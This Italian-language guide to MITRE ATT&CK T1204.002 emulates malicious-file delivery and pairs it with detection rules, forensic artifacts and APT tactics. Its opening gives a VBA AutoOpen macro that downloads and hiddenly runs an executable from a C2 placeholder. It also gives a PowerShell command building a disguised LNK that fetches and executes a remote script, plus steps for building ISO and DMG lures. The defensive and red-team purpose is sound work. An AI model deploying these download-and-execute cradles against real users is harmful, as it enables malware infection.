Malicious File: User Execution - Malicious File (T1204.002)

Per simulare efficacemente questa tecnica in ambiente controllato, iniziamo con la creazione di un documento Word malevolo. Il processo richiede la costruzione di una macro VBA che scarichi ed esegua un payload secondario:

Sub AutoOpen()
    Dim xHttp: Set xHttp = CreateObject("MSXML2.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://[C2-SERVER]/payload.exe", False
    xHttp.Send
    With bStrm
        .Type = 1
        .Open
        .Write xHttp.responseBody
        .SaveToFile Environ("TEMP") & "\update.exe", 2
    End With
    Shell Environ("TEMP") & "\update.exe", vbHide
End Sub

La simulazione di un attacco tramite file LNK richiede PowerShell per la creazione del collegamento malevolo. Questo approccio risulta particolarmente efficace perché i file LNK appaiono come normali collegamenti:

powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\temp\Important_Document.lnk'); $s.TargetPath = 'cmd.exe'; $s.Arguments = '/c powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(''http://[C2]/script.ps1'')'; $s.IconLocation = 'C:\Windows\System32\shell32.dll,1'; $s.Save()"

Per testare la resilienza contro file ISO malevoli, particolarmente utilizzati da gruppi come EXOTIC LILY, possiamo creare un'immagine contenente sia un documento esca che il payload nascosto. Su Linux, il processo diventa:

mkisofs -o malicious.iso -J -r -V "Q3_Reports" /path/to/payload/

L'inserimento di un file LNK all'interno dell'ISO aumenta l'efficacia dell'attacco. Quando l'utente monta l'ISO e clicca sul documento apparentemente legittimo, viene invece eseguito il malware nascosto.

Per simulare attacchi su macOS, sfruttiamo i DMG trojanizzati seguendo le tattiche di OSX/Shlayer. La creazione richiede:

hdiutil create -size 10m -fs HFS+ -volname "Flash_Update" temp.dmg hdiutil attach temp.dmg

Successivamente inseriamo l'applicazione malevola mascherata da installer legittimo, completa di icona convincente per ingannare l'utente.

Il rilevamento efficace di file malevoli richiede un approccio stratificato che monitorizzi diversi punti della catena di esecuzione. La detection primaria si basa sul monitoraggio delle relazioni parent-child anomale tra processi.

Quando un documento Office genera processi di sistema come powershell.exe o wscript.exe, siamo di fronte a un comportamento altamente sospetto. La regola di detection deve catturare:

EventID 1 (Process Create) dove ParentImage contiene "WINWORD.EXE" E Image contiene ("powershell.exe" OR "cmd.exe" OR "wscript.exe")

Il monitoraggio delle scritture su disco in directory temporanee rappresenta un altro indicatore chiave. I documenti malevoli tipicamente scaricano payload in %TEMP% o %APPDATA% prima dell'esecuzione:

EventID 11 (File Create) dove TargetFilename contiene ("\AppData\Local\Temp" OR "\Downloads") E Extension in (".exe", ".scr", ".bat", ".ps1")

Per ridurre i falsi positivi, implementiamo una whitelist basata sui certificati digitali dei software legittimi utilizzati nell'organizzazione. Questo permette di filtrare le installazioni autorizzate mantenendo alta la sensibilità verso file non firmati o con certificati sospetti.

La correlazione temporale tra download e esecuzione diventa cruciale. Un file scaricato da Outlook che genera un processo entro 5 minuti richiede investigazione immediata. Questa finestra temporale cattura la maggior parte degli attacchi automatizzati riducendo il rumore di fondo.

Per i file ISO e IMG, monitoriamo gli eventi di mount del volume seguiti da esecuzione di file al loro interno. Windows 10 genera eventi specifici quando un'immagine viene montata, permettendo di correlare con successive esecuzioni sospette.

L'analisi forense di un'esecuzione malevola inizia dall'identificazione del file originale e dalla ricostruzione della catena di eventi. I punti di partenza critici includono il registro MRU (Most Recently Used) di Office e i database di Zone.Identifier.

Nel registro di Windows, la chiave HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\File MRU contiene gli ultimi documenti aperti con timestamp precisi. Questi dati, correlati con i log di Outlook, permettono di identificare l'email di phishing originale.

L'analisi del Prefetch rivela la sequenza di esecuzione. I file .pf in C:\Windows\Prefetch mostrano non solo quando un'applicazione è stata lanciata, ma anche quali DLL e file sono stati accessi durante l'esecuzione. Per un documento malevolo, vedremo tipicamente:

• WINWORD.EXE-[HASH].pf con timestamp dell'apertura
• Riferimenti a file creati in %TEMP%
• Successiva apparizione di CMD.EXE o POWERSHELL.EXE nel Prefetch

Il registro AmCache (C:\Windows\appcompat\Programs\Amcache.hve) fornisce dettagli sui file eseguiti, inclusi hash SHA1, percorsi completi e timestamp di prima esecuzione. Questi dati sono particolarmente utili per file che sono stati successivamente eliminati.

Per ricostruire l'attività di download, analizziamo i browser artifact. Chrome salva la cronologia dei download in History SQLite database, mentre Edge utilizza il formato WebCacheV01.dat. Questi database contengono URL di origine, timestamp e percorsi di salvataggio locali.

L'analisi della memoria volatile può rivelare processi con injection o comportamenti anomali. Utilizzando Volatility, identifichiamo:

volatility -f memory.dmp windows.psscan | grep -E "powershell|wscript|mshta"

Particolare attenzione va posta agli artefatti di Windows Defender. Il registro di quarantena contiene spesso copie dei file malevoli iniziali che possono essere estratti per analisi statica completa.

L'analisi delle tattiche di distribuzione dei file malevoli rivela pattern distintivi tra i diversi gruppi APT. APT29 (Cozy Bear) mostra una predilezione per documenti Word con macro sofisticate e file LNK camuffati, spesso distribuiti attraverso campagne mirate contro ambasciate e think tank.

Lazarus Group utilizza costantemente il tema delle false offerte di lavoro, con documenti PDF e Word che promettono posizioni in aziende aerospace e difesa. I loro file contengono tipicamente macro multi-stadio che verificano l'ambiente prima di scaricare il payload finale.

I gruppi iraniani come APT33 e Magic Hound preferiscono documenti Excel con macro che sfruttano legittime API di Windows per il download. Osserviamo una tendenza all'uso di domini compromessi legitimi per ospitare i payload, rendendo più difficile il blocking basato su reputazione.

FIN7 rappresenta l'eccellenza nell'ingegneria sociale applicata ai file malevoli. Le loro campagne utilizzano:

• Documenti con loghi aziendali perfettamente replicati
• File LNK nascosti in immagini che sembrano screenshot
• Catene di infection che coinvolgono JavaScript offuscato

L'evoluzione recente mostra un incremento nell'uso di file ISO e IMG, particolarmente dopo che Microsoft ha disabilitato le macro per default. Gruppi come EXOTIC LILY e Bumblebee hanno rapidamente adattato le loro tattiche, confermando l'agilità operativa di questi attori.

Pattern geografici emergono chiaramente: gli APT dell'Asia orientale preferiscono archivi RAR protetti da password con istruzioni in email, mentre i gruppi dell'Europa dell'Est favoriscono catene complesse con múltiple reindirizzamenti.

Analisi basata su MITRE ATT&CK Framework, dati di 84 gruppi APT documentati, 90 famiglie di malware analizzate e 11 campagne investigate tra cui Frankenstein, Operation Spalax e Operation Dream Job.